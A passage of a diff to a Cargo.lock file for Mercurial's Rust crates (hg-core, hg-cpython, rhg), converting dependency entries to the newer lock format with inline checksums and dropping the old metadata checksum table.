(registry+https://github.com/rust-lang/crates.io-index)", + "byteorder", + "bytes-cast", + "clap", + "crossbeam-channel 0.4.4", + "derive_more", + "flate2", + "format-bytes", + "home", + "im-rc", + "lazy_static", + "log", + "memmap", + "micro-timer", + "pretty_assertions", + "rand 0.7.3", + "rand_distr", + "rand_pcg", + "rayon", + "regex", + "rust-crypto", + "same-file", + "tempfile", + "twox-hash", + "zstd", ] [[package]] name = "hg-cpython" version = "0.1.0" dependencies = [ - "cpython 0.4.1 (registry+https://github.com/rust-lang/crates.io-index)", - "crossbeam-channel 0.4.4 (registry+https://github.com/rust-lang/crates.io-index)", - "env_logger 0.7.1 (registry+https://github.com/rust-lang/crates.io-index)", - "hg-core 0.1.0", - "libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)", - "log 0.4.11 (registry+https://github.com/rust-lang/crates.io-index)", + "cpython", + "crossbeam-channel 0.4.4", + "env_logger", + "hg-core", + "libc", + "log", ] [[package]] name = "home" version = "0.5.3" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "2456aef2e6b6a9784192ae780c0f15bc57df0e918585282325e8c8ac27737654" dependencies = [ - "winapi 0.3.9 (registry+https://github.com/rust-lang/crates.io-index)", + "winapi", ] [[package]] name = "humantime" version = "1.3.0" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "df004cfca50ef23c36850aaaa59ad52cc70d0e90243c3c7737a4dd32dc7a3c4f" dependencies = [ - "quick-error 1.2.3 (registry+https://github.com/rust-lang/crates.io-index)", + "quick-error", ] [[package]] name = "im-rc" version = "15.0.0" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "3ca8957e71f04a205cb162508f9326aea04676c8dfd0711220190d6b83664f3f" dependencies = [ - "bitmaps 2.1.0 (registry+https://github.com/rust-lang/crates.io-index)", - "rand_core 0.5.1 (registry+https://github.com/rust-lang/crates.io-index)", - "rand_xoshiro 0.4.0 
(registry+https://github.com/rust-lang/crates.io-index)", - "sized-chunks 0.6.2 (registry+https://github.com/rust-lang/crates.io-index)", - "typenum 1.12.0 (registry+https://github.com/rust-lang/crates.io-index)", - "version_check 0.9.2 (registry+https://github.com/rust-lang/crates.io-index)", + "bitmaps", + "rand_core 0.5.1", + "rand_xoshiro", + "sized-chunks", + "typenum", + "version_check", ] [[package]] name = "itertools" version = "0.9.0" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "284f18f85651fe11e8a991b2adb42cb078325c996ed026d994719efcfca1d54b" dependencies = [ - "either 1.6.1 (registry+https://github.com/rust-lang/crates.io-index)", + "either", ] [[package]] name = "jobserver" version = "0.1.21" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "5c71313ebb9439f74b00d9d2dcec36440beaf57a6aa0623068441dd7cd81a7f2" dependencies = [ - "libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)", + "libc", ] [[package]] name = "lazy_static" version = "1.4.0" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "e2abad23fbc42b3700f2f279844dc832adb2b2eb069b2df918f455c4e18cc646" [[package]] name = "libc" version = "0.2.81" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "1482821306169ec4d07f6aca392a4681f66c75c9918aa49641a2595db64053cb" [[package]] name = "libz-sys" version = "1.1.2" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "602113192b08db8f38796c4e85c39e960c145965140e918018bcde1952429655" dependencies = [ - "cc 1.0.66 (registry+https://github.com/rust-lang/crates.io-index)", - "pkg-config 0.3.19 (registry+https://github.com/rust-lang/crates.io-index)", - "vcpkg 0.2.11 (registry+https://github.com/rust-lang/crates.io-index)", + "cc", + "pkg-config", + "vcpkg", ] [[package]] name = "log" version = "0.4.11" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = 
"4fabed175da42fed1fa0746b0ea71f412aa9d35e76e95e59b192c64b9dc2bf8b" dependencies = [ - "cfg-if 0.1.10 (registry+https://github.com/rust-lang/crates.io-index)", + "cfg-if 0.1.10", ] [[package]] name = "maybe-uninit" version = "2.0.0" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "60302e4db3a61da70c0cb7991976248362f30319e88850c487b9b95bbf059e00" [[package]] name = "memchr" version = "2.3.4" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "0ee1c47aaa256ecabcaea351eae4a9b01ef39ed810004e298d2511ed284b1525" [[package]] name = "memmap" version = "0.7.0" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "6585fd95e7bb50d6cc31e20d4cf9afb4e2ba16c5846fc76793f11218da9c475b" dependencies = [ - "libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)", - "winapi 0.3.9 (registry+https://github.com/rust-lang/crates.io-index)", + "libc", + "winapi", ] [[package]] name = "memoffset" version = "0.6.1" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "157b4208e3059a8f9e78d559edc658e13df41410cb3ae03979c83130067fdd87" dependencies = [ - "autocfg 1.0.1 (registry+https://github.com/rust-lang/crates.io-index)", + "autocfg", ] [[package]] name = "micro-timer" version = "0.3.1" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "2620153e1d903d26b72b89f0e9c48d8c4756cba941c185461dddc234980c298c" dependencies = [ - "micro-timer-macros 0.3.1 (registry+https://github.com/rust-lang/crates.io-index)", - "scopeguard 1.1.0 (registry+https://github.com/rust-lang/crates.io-index)", + "micro-timer-macros", + "scopeguard", ] [[package]] name = "micro-timer-macros" version = "0.3.1" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "e28a3473e6abd6e9aab36aaeef32ad22ae0bd34e79f376643594c2b152ec1c5d" dependencies = [ - "proc-macro2 1.0.24 (registry+https://github.com/rust-lang/crates.io-index)", - "quote 1.0.7 
(registry+https://github.com/rust-lang/crates.io-index)", - "scopeguard 1.1.0 (registry+https://github.com/rust-lang/crates.io-index)", - "syn 1.0.54 (registry+https://github.com/rust-lang/crates.io-index)", + "proc-macro2", + "quote", + "scopeguard", + "syn", ] [[package]] name = "miniz_oxide" version = "0.4.3" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "0f2d26ec3309788e423cfbf68ad1800f061638098d76a83681af979dc4eda19d" dependencies = [ - "adler 0.2.3 (registry+https://github.com/rust-lang/crates.io-index)", - "autocfg 1.0.1 (registry+https://github.com/rust-lang/crates.io-index)", + "adler", + "autocfg", ] [[package]] name = "num-integer" version = "0.1.44" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "d2cc698a63b549a70bc047073d2949cce27cd1c7b0a4a862d08a8031bc2801db" dependencies = [ - "autocfg 1.0.1 (registry+https://github.com/rust-lang/crates.io-index)", - "num-traits 0.2.14 (registry+https://github.com/rust-lang/crates.io-index)", + "autocfg", + "num-traits", ] [[package]] name = "num-traits" version = "0.2.14" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "9a64b1ec5cda2586e284722486d802acf1f7dbdc623e2bfc57e65ca1cd099290" dependencies = [ - "autocfg 1.0.1 (registry+https://github.com/rust-lang/crates.io-index)", + "autocfg", ] [[package]] name = "num_cpus" version = "1.13.0" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "05499f3756671c15885fee9034446956fff3f243d6077b91e5767df161f766b3" dependencies = [ - "hermit-abi 0.1.17 (registry+https://github.com/rust-lang/crates.io-index)", - "libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)", + "hermit-abi", + "libc", ] [[package]] name = "output_vt100" version = "0.1.2" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "53cdc5b785b7a58c5aad8216b3dfa114df64b0b06ae6e1501cef91df2fbdf8f9" dependencies = [ - "winapi 0.3.9 
(registry+https://github.com/rust-lang/crates.io-index)", + "winapi", ] [[package]] name = "pkg-config" version = "0.3.19" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "3831453b3449ceb48b6d9c7ad7c96d5ea673e9b470a1dc578c2ce6521230884c" [[package]] name = "ppv-lite86" version = "0.2.10" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "ac74c624d6b2d21f425f752262f42188365d7b8ff1aff74c82e45136510a4857" [[package]] name = "pretty_assertions" version = "0.6.1" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "3f81e1644e1b54f5a68959a29aa86cde704219254669da328ecfdf6a1f09d427" dependencies = [ - "ansi_term 0.11.0 (registry+https://github.com/rust-lang/crates.io-index)", - "ctor 0.1.16 (registry+https://github.com/rust-lang/crates.io-index)", - "difference 2.0.0 (registry+https://github.com/rust-lang/crates.io-index)", - "output_vt100 0.1.2 (registry+https://github.com/rust-lang/crates.io-index)", + "ansi_term", + "ctor", + "difference", + "output_vt100", ] [[package]] name = "proc-macro-hack" version = "0.5.19" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "dbf0c48bc1d91375ae5c3cd81e3722dff1abcf81a30960240640d223f59fe0e5" [[package]] name = "proc-macro2" version = "1.0.24" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "1e0704ee1a7e00d7bb417d0770ea303c1bccbabf0ef1667dae92b5967f5f8a71" dependencies = [ - "unicode-xid 0.2.1 (registry+https://github.com/rust-lang/crates.io-index)", + "unicode-xid", ] [[package]] name = "python27-sys" version = "0.4.1" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "67cb041de8615111bf224dd75667af5f25c6e032118251426fed7f1b70ce4c8c" dependencies = [ - "libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)", - "regex 1.4.2 (registry+https://github.com/rust-lang/crates.io-index)", + "libc", + "regex", ] [[package]] name = "python3-sys" version = "0.4.1" 
source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "90af11779515a1e530af60782d273b59ac79d33b0e253c071a728563957c76d4" dependencies = [ - "libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)", - "regex 1.4.2 (registry+https://github.com/rust-lang/crates.io-index)", + "libc", + "regex", ] [[package]] name = "quick-error" version = "1.2.3" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "a1d01941d82fa2ab50be1e79e6714289dd7cde78eba4c074bc5a4374f650dfe0" [[package]] name = "quote" version = "1.0.7" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "aa563d17ecb180e500da1cfd2b028310ac758de548efdd203e18f283af693f37" dependencies = [ - "proc-macro2 1.0.24 (registry+https://github.com/rust-lang/crates.io-index)", + "proc-macro2", ] [[package]] name = "rand" version = "0.3.23" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "64ac302d8f83c0c1974bf758f6b041c6c8ada916fbb44a609158ca8b064cc76c" dependencies = [ - "libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)", - "rand 0.4.6 (registry+https://github.com/rust-lang/crates.io-index)", + "libc", + "rand 0.4.6", ] [[package]] name = "rand" version = "0.4.6" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "552840b97013b1a26992c11eac34bdd778e464601a4c2054b5f0bff7c6761293" dependencies = [ - "fuchsia-cprng 0.1.1 (registry+https://github.com/rust-lang/crates.io-index)", - "libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)", - "rand_core 0.3.1 (registry+https://github.com/rust-lang/crates.io-index)", - "rdrand 0.4.0 (registry+https://github.com/rust-lang/crates.io-index)", - "winapi 0.3.9 (registry+https://github.com/rust-lang/crates.io-index)", + "fuchsia-cprng", + "libc", + "rand_core 0.3.1", + "rdrand", + "winapi", ] [[package]] name = "rand" version = "0.7.3" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = 
"6a6b1679d49b24bbfe0c803429aa1874472f50d9b363131f0e89fc356b544d03" dependencies = [ - "getrandom 0.1.15 (registry+https://github.com/rust-lang/crates.io-index)", - "libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)", - "rand_chacha 0.2.2 (registry+https://github.com/rust-lang/crates.io-index)", - "rand_core 0.5.1 (registry+https://github.com/rust-lang/crates.io-index)", - "rand_hc 0.2.0 (registry+https://github.com/rust-lang/crates.io-index)", + "getrandom", + "libc", + "rand_chacha", + "rand_core 0.5.1", + "rand_hc", ] [[package]] name = "rand_chacha" version = "0.2.2" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "f4c8ed856279c9737206bf725bf36935d8666ead7aa69b52be55af369d193402" dependencies = [ - "ppv-lite86 0.2.10 (registry+https://github.com/rust-lang/crates.io-index)", - "rand_core 0.5.1 (registry+https://github.com/rust-lang/crates.io-index)", + "ppv-lite86", + "rand_core 0.5.1", ] [[package]] name = "rand_core" version = "0.3.1" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "7a6fdeb83b075e8266dcc8762c22776f6877a63111121f5f8c7411e5be7eed4b" dependencies = [ - "rand_core 0.4.2 (registry+https://github.com/rust-lang/crates.io-index)", + "rand_core 0.4.2", ] [[package]] name = "rand_core" version = "0.4.2" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "9c33a3c44ca05fa6f1807d8e6743f3824e8509beca625669633be0acbdf509dc" [[package]] name = "rand_core" version = "0.5.1" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "90bde5296fc891b0cef12a6d03ddccc162ce7b2aff54160af9338f8d40df6d19" dependencies = [ - "getrandom 0.1.15 (registry+https://github.com/rust-lang/crates.io-index)", + "getrandom", ] [[package]] name = "rand_distr" version = "0.2.2" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "96977acbdd3a6576fb1d27391900035bf3863d4a16422973a409b488cf29ffb2" dependencies = [ - "rand 0.7.3 
(registry+https://github.com/rust-lang/crates.io-index)", + "rand 0.7.3", ] [[package]] name = "rand_hc" version = "0.2.0" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "ca3129af7b92a17112d59ad498c6f81eaf463253766b90396d39ea7a39d6613c" dependencies = [ - "rand_core 0.5.1 (registry+https://github.com/rust-lang/crates.io-index)", + "rand_core 0.5.1", ] [[package]] name = "rand_pcg" version = "0.2.1" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "16abd0c1b639e9eb4d7c50c0b8100b0d0f849be2349829c740fe8e6eb4816429" dependencies = [ - "rand_core 0.5.1 (registry+https://github.com/rust-lang/crates.io-index)", + "rand_core 0.5.1", ] [[package]] name = "rand_xoshiro" version = "0.4.0" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "a9fcdd2e881d02f1d9390ae47ad8e5696a9e4be7b547a1da2afbc61973217004" dependencies = [ - "rand_core 0.5.1 (registry+https://github.com/rust-lang/crates.io-index)", + "rand_core 0.5.1", ] [[package]] name = "rayon" version = "1.5.0" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "8b0d8e0819fadc20c74ea8373106ead0600e3a67ef1fe8da56e39b9ae7275674" dependencies = [ - "autocfg 1.0.1 (registry+https://github.com/rust-lang/crates.io-index)", - "crossbeam-deque 0.8.0 (registry+https://github.com/rust-lang/crates.io-index)", - "either 1.6.1 (registry+https://github.com/rust-lang/crates.io-index)", - "rayon-core 1.9.0 (registry+https://github.com/rust-lang/crates.io-index)", + "autocfg", + "crossbeam-deque", + "either", + "rayon-core", ] [[package]] name = "rayon-core" version = "1.9.0" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "9ab346ac5921dc62ffa9f89b7a773907511cdfa5490c572ae9be1be33e8afa4a" dependencies = [ - "crossbeam-channel 0.5.0 (registry+https://github.com/rust-lang/crates.io-index)", - "crossbeam-deque 0.8.0 (registry+https://github.com/rust-lang/crates.io-index)", - "crossbeam-utils 0.8.1 
(registry+https://github.com/rust-lang/crates.io-index)", - "lazy_static 1.4.0 (registry+https://github.com/rust-lang/crates.io-index)", - "num_cpus 1.13.0 (registry+https://github.com/rust-lang/crates.io-index)", + "crossbeam-channel 0.5.0", + "crossbeam-deque", + "crossbeam-utils 0.8.1", + "lazy_static", + "num_cpus", ] [[package]] name = "rdrand" version = "0.4.0" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "678054eb77286b51581ba43620cc911abf02758c91f93f479767aed0f90458b2" dependencies = [ - "rand_core 0.3.1 (registry+https://github.com/rust-lang/crates.io-index)", + "rand_core 0.3.1", ] [[package]] name = "redox_syscall" version = "0.1.57" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "41cc0f7e4d5d4544e8861606a285bb08d3e70712ccc7d2b84d7c0ccfaf4b05ce" [[package]] name = "regex" version = "1.4.2" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "38cf2c13ed4745de91a5eb834e11c00bcc3709e773173b2ce4c56c9fbde04b9c" dependencies = [ - "aho-corasick 0.7.15 (registry+https://github.com/rust-lang/crates.io-index)", - "memchr 2.3.4 (registry+https://github.com/rust-lang/crates.io-index)", - "regex-syntax 0.6.21 (registry+https://github.com/rust-lang/crates.io-index)", - "thread_local 1.0.1 (registry+https://github.com/rust-lang/crates.io-index)", + "aho-corasick", + "memchr", + "regex-syntax", + "thread_local", ] [[package]] name = "regex-syntax" version = "0.6.21" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "3b181ba2dcf07aaccad5448e8ead58db5b742cf85dfe035e2227f137a539a189" [[package]] name = "remove_dir_all" version = "0.5.3" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "3acd125665422973a33ac9d3dd2df85edad0f4ae9b00dafb1a05e43a9f5ef8e7" dependencies = [ - "winapi 0.3.9 (registry+https://github.com/rust-lang/crates.io-index)", + "winapi", ] [[package]] name = "rhg" version = "0.1.0" dependencies = [ - "chrono 0.4.19 
(registry+https://github.com/rust-lang/crates.io-index)", - "clap 2.33.3 (registry+https://github.com/rust-lang/crates.io-index)", - "derive_more 0.99.11 (registry+https://github.com/rust-lang/crates.io-index)", - "env_logger 0.7.1 (registry+https://github.com/rust-lang/crates.io-index)", - "format-bytes 0.2.0 (registry+https://github.com/rust-lang/crates.io-index)", - "hg-core 0.1.0", - "log 0.4.11 (registry+https://github.com/rust-lang/crates.io-index)", - "micro-timer 0.3.1 (registry+https://github.com/rust-lang/crates.io-index)", - "users 0.11.0 (registry+https://github.com/rust-lang/crates.io-index)", + "chrono", + "clap", + "derive_more", + "env_logger", + "format-bytes", + "hg-core", + "log", + "micro-timer", + "users", ] [[package]] name = "rust-crypto" version = "0.2.36" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "f76d05d3993fd5f4af9434e8e436db163a12a9d40e1a58a726f27a01dfd12a2a" dependencies = [ - "gcc 0.3.55 (registry+https://github.com/rust-lang/crates.io-index)", - "libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)", - "rand 0.3.23 (registry+https://github.com/rust-lang/crates.io-index)", - "rustc-serialize 0.3.24 (registry+https://github.com/rust-lang/crates.io-index)", - "time 0.1.44 (registry+https://github.com/rust-lang/crates.io-index)", + "gcc", + "libc", + "rand 0.3.23", + "rustc-serialize", + "time", ] [[package]] name = "rustc-serialize" version = "0.3.24" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "dcf128d1287d2ea9d80910b5f1120d0b8eede3fbf1abe91c40d39ea7d51e6fda" [[package]] name = "same-file" version = "1.0.6" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "93fc1dc3aaa9bfed95e02e6eadabb4baf7e3078b0bd1b4d7b6b0b68378900502" dependencies = [ - "winapi-util 0.1.5 (registry+https://github.com/rust-lang/crates.io-index)", + "winapi-util", ] [[package]] name = "scopeguard" version = "1.1.0" source = 
"registry+https://github.com/rust-lang/crates.io-index" +checksum = "d29ab0c6d3fc0ee92fe66e2d99f700eab17a8d57d1c1d3b748380fb20baa78cd" [[package]] name = "sized-chunks" version = "0.6.2" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "1ec31ceca5644fa6d444cc77548b88b67f46db6f7c71683b0f9336e671830d2f" dependencies = [ - "bitmaps 2.1.0 (registry+https://github.com/rust-lang/crates.io-index)", - "typenum 1.12.0 (registry+https://github.com/rust-lang/crates.io-index)", + "bitmaps", + "typenum", ] [[package]] name = "static_assertions" version = "1.1.0" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "a2eb9349b6444b326872e140eb1cf5e7c522154d69e7a0ffb0fb81c06b37543f" [[package]] name = "strsim" version = "0.8.0" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "8ea5119cdb4c55b55d432abb513a0429384878c15dde60cc77b1c99de1a95a6a" [[package]] name = "syn" version = "1.0.54" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "9a2af957a63d6bd42255c359c93d9bfdb97076bd3b820897ce55ffbfbf107f44" dependencies = [ - "proc-macro2 1.0.24 (registry+https://github.com/rust-lang/crates.io-index)", - "quote 1.0.7 (registry+https://github.com/rust-lang/crates.io-index)", - "unicode-xid 0.2.1 (registry+https://github.com/rust-lang/crates.io-index)", + "proc-macro2", + "quote", + "unicode-xid", ] [[package]] name = "tempfile" version = "3.1.0" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "7a6e24d9338a0a5be79593e2fa15a648add6138caa803e2d5bc782c371732ca9" dependencies = [ - "cfg-if 0.1.10 (registry+https://github.com/rust-lang/crates.io-index)", - "libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)", - "rand 0.7.3 (registry+https://github.com/rust-lang/crates.io-index)", - "redox_syscall 0.1.57 (registry+https://github.com/rust-lang/crates.io-index)", - "remove_dir_all 0.5.3 (registry+https://github.com/rust-lang/crates.io-index)", - 
"winapi 0.3.9 (registry+https://github.com/rust-lang/crates.io-index)", + "cfg-if 0.1.10", + "libc", + "rand 0.7.3", + "redox_syscall", + "remove_dir_all", + "winapi", ] [[package]] name = "termcolor" version = "1.1.2" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "2dfed899f0eb03f32ee8c6a0aabdb8a7949659e3466561fc0adf54e26d88c5f4" dependencies = [ - "winapi-util 0.1.5 (registry+https://github.com/rust-lang/crates.io-index)", + "winapi-util", ] [[package]] name = "textwrap" version = "0.11.0" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "d326610f408c7a4eb6f51c37c330e496b08506c9457c9d34287ecc38809fb060" dependencies = [ - "unicode-width 0.1.8 (registry+https://github.com/rust-lang/crates.io-index)", + "unicode-width", ] [[package]] name = "thread_local" version = "1.0.1" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "d40c6d1b69745a6ec6fb1ca717914848da4b44ae29d9b3080cbee91d72a69b14" dependencies = [ - "lazy_static 1.4.0 (registry+https://github.com/rust-lang/crates.io-index)", + "lazy_static", ] [[package]] name = "time" version = "0.1.44" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "6db9e6914ab8b1ae1c260a4ae7a49b6c5611b40328a735b21862567685e73255" dependencies = [ - "libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)", - "wasi 0.10.0+wasi-snapshot-preview1 (registry+https://github.com/rust-lang/crates.io-index)", - "winapi 0.3.9 (registry+https://github.com/rust-lang/crates.io-index)", + "libc", + "wasi 0.10.0+wasi-snapshot-preview1", + "winapi", ] [[package]] name = "twox-hash" version = "1.6.0" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "04f8ab788026715fa63b31960869617cba39117e520eb415b0139543e325ab59" dependencies = [ - "cfg-if 0.1.10 (registry+https://github.com/rust-lang/crates.io-index)", - "rand 0.7.3 (registry+https://github.com/rust-lang/crates.io-index)", - "static_assertions 1.1.0 
(registry+https://github.com/rust-lang/crates.io-index)", + "cfg-if 0.1.10", + "rand 0.7.3", + "static_assertions", ] [[package]] name = "typenum" version = "1.12.0" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "373c8a200f9e67a0c95e62a4f52fbf80c23b4381c05a17845531982fa99e6b33" [[package]] name = "unicode-width" version = "0.1.8" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "9337591893a19b88d8d87f2cec1e73fad5cdfd10e5a6f349f498ad6ea2ffb1e3" [[package]] name = "unicode-xid" version = "0.2.1" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "f7fe0bb3479651439c9112f72b6c505038574c9fbb575ed1bf3b797fa39dd564" [[package]] name = "users" version = "0.11.0" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "24cc0f6d6f267b73e5a2cadf007ba8f9bc39c6a6f9666f8cf25ea809a153b032" dependencies = [ - "libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)", - "log 0.4.11 (registry+https://github.com/rust-lang/crates.io-index)", + "libc", + "log", ] [[package]] name = "vcpkg" version = "0.2.11" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "b00bca6106a5e23f3eee943593759b7fcddb00554332e856d990c893966879fb" [[package]] name = "vec_map" version = "0.8.2" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "f1bddf1187be692e79c5ffeab891132dfb0f236ed36a43c7ed39f1165ee20191" [[package]] name = "version_check" version = "0.9.2" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "b5a972e5669d67ba988ce3dc826706fb0a8b01471c088cb0b6110b805cc36aed" [[package]] name = "wasi" version = "0.9.0+wasi-snapshot-preview1" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "cccddf32554fecc6acb585f82a32a72e28b48f8c4c1883ddfeeeaa96f7d8e519" [[package]] name = "wasi" version = "0.10.0+wasi-snapshot-preview1" source = "registry+https://github.com/rust-lang/crates.io-index" 
+checksum = "1a143597ca7c7793eff794def352d41792a93c481eb1042423ff7ff72ba2c31f" [[package]] name = "winapi" version = "0.3.9" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "5c839a674fcd7a98952e593242ea400abe93992746761e38641405d28b00f419" dependencies = [ - "winapi-i686-pc-windows-gnu 0.4.0 (registry+https://github.com/rust-lang/crates.io-index)", - "winapi-x86_64-pc-windows-gnu 0.4.0 (registry+https://github.com/rust-lang/crates.io-index)", + "winapi-i686-pc-windows-gnu", + "winapi-x86_64-pc-windows-gnu", ] [[package]] name = "winapi-i686-pc-windows-gnu" version = "0.4.0" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "ac3b87c63620426dd9b991e5ce0329eff545bccbbb34f3be09ff6fb6ab51b7b6" [[package]] name = "winapi-util" version = "0.1.5" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "70ec6ce85bb158151cae5e5c87f95a8e97d2c0c4b001223f33a334e3ce5de178" dependencies = [ - "winapi 0.3.9 (registry+https://github.com/rust-lang/crates.io-index)", + "winapi", ] [[package]] name = "winapi-x86_64-pc-windows-gnu" version = "0.4.0" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "712e227841d057c1ee1cd2fb22fa7e5a5461ae8e48fa2ca79ec42cfc1931183f" [[package]] name = "zstd" version = "0.5.3+zstd.1.4.5" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "01b32eaf771efa709e8308605bbf9319bf485dc1503179ec0469b611937c0cd8" dependencies = [ - "zstd-safe 2.0.5+zstd.1.4.5 (registry+https://github.com/rust-lang/crates.io-index)", + "zstd-safe", ] [[package]] name = "zstd-safe" version = "2.0.5+zstd.1.4.5" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "1cfb642e0d27f64729a639c52db457e0ae906e7bc6f5fe8f5c453230400f1055" dependencies = [ - "libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)", - "zstd-sys 1.4.17+zstd.1.4.5 (registry+https://github.com/rust-lang/crates.io-index)", + "libc", + "zstd-sys", ] 
[[package]] name = "zstd-sys" version = "1.4.17+zstd.1.4.5" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "b89249644df056b522696b1bb9e7c18c87e8ffa3e2f0dc3b0155875d6498f01b" dependencies = [ - "cc 1.0.66 (registry+https://github.com/rust-lang/crates.io-index)", - "glob 0.3.0 (registry+https://github.com/rust-lang/crates.io-index)", - "itertools 0.9.0 (registry+https://github.com/rust-lang/crates.io-index)", - "libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)", + "cc", + "glob", + "itertools", + "libc", ] - -[metadata] -"checksum adler 0.2.3 (registry+https://github.com/rust-lang/crates.io-index)" = "ee2a4ec343196209d6594e19543ae87a39f96d5534d7174822a3ad825dd6ed7e" -"checksum aho-corasick 0.7.15 (registry+https://github.com/rust-lang/crates.io-index)" = "7404febffaa47dac81aa44dba71523c9d069b1bdc50a77db41195149e17f68e5" -"checksum ansi_term 0.11.0 (registry+https://github.com/rust-lang/crates.io-index)" = "ee49baf6cb617b853aa8d93bf420db2383fab46d314482ca2803b40d5fde979b" -"checksum atty 0.2.14 (registry+https://github.com/rust-lang/crates.io-index)" = "d9b39be18770d11421cdb1b9947a45dd3f37e93092cbf377614828a319d5fee8" -"checksum autocfg 1.0.1 (registry+https://github.com/rust-lang/crates.io-index)" = "cdb031dd78e28731d87d56cc8ffef4a8f36ca26c38fe2de700543e627f8a464a" -"checksum bitflags 1.2.1 (registry+https://github.com/rust-lang/crates.io-index)" = "cf1de2fe8c75bc145a2f577add951f8134889b4795d47466a54a5c846d691693" -"checksum bitmaps 2.1.0 (registry+https://github.com/rust-lang/crates.io-index)" = "031043d04099746d8db04daf1fa424b2bc8bd69d92b25962dcde24da39ab64a2" -"checksum byteorder 1.3.4 (registry+https://github.com/rust-lang/crates.io-index)" = "08c48aae112d48ed9f069b33538ea9e3e90aa263cfa3d1c24309612b1f7472de" -"checksum bytes-cast 0.1.0 (registry+https://github.com/rust-lang/crates.io-index)" = "3196ba300c7bc9282a4331e878496cb3e9603a898a8f1446601317163e16ca52" -"checksum bytes-cast-derive 0.1.0 
